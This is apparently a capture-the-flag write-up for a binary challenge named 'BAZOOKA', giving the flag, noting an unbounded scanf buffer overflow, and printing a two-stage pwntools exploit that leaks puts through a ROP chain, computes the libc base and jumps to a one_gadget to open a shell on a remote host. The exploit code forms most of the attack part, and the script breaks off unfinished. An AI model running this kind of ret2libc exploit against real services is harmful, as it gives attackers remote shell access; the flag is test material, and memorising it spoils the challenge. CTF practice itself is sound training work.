BAZOOKA

Proof of flag

ctf{9bb6df8e98240b46601db436ad276eaa635a846c9a5afa5b2075907adf39244b}

Summary of the vulnerabilities identified

Just a super simple buffer overflow(Don’t need to tell me “Try Harder” mom).

Proof of solving

The program in the first part prompts the user to input "#!@{try_hard3r}" to go on the vuln function, where the buffer overrun happens by using “%s” in the scanf format string and not “%Xs”, where X is a natural number. First I find the libc base address and use an ONE Gadget to land me on an execve("/bin/sh", 0, 0)

from pwn import *
#context.terminal = 'st'
p = remote("34.89.211.188", 30027)
elf = ELF('./pwn_bazooka_bazooka')
pop_rdi = 0x004008f3 #: pop rdi
print(hex(elf.plt['puts']))
VULN = 0x4006f7
exploit = b"A"*112 + b"B"*8 +p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) +
p64(VULN)
log.info("First Stage: Sending the cool killer exploit string: %s" % exploit)
p.sendline("#!@{try_hard3r}") # HA ha I really laugh at it
p.sendline(exploit)
p.recvuntil("Message: Hacker alert!!!")
p.recvline()
u = p.recvline()
u = u.split(b'\n')[0]
u = u64(u.ljust(8, b'\x00'))
log.info("puts: "+hex(u))
libc_base = u - 0x80aa0
log.info("Libc base at 0x%x" % libc_base)
ONE = 0x4f432 + libc_base # one shot gadget
exploit = b"A"*112 + b"B"*8 +p64(ONE) + p64(ONE)
log.info("Second Stage: Sending exploit...")
p.sendline(exploit)
p.interactive(

BAZOOKA

BAZOOKA #

Proof of flag #

Summary of the vulnerabilities identified #

Proof of solving #

BAZOOKA

Proof of flag

Summary of the vulnerabilities identified

Proof of solving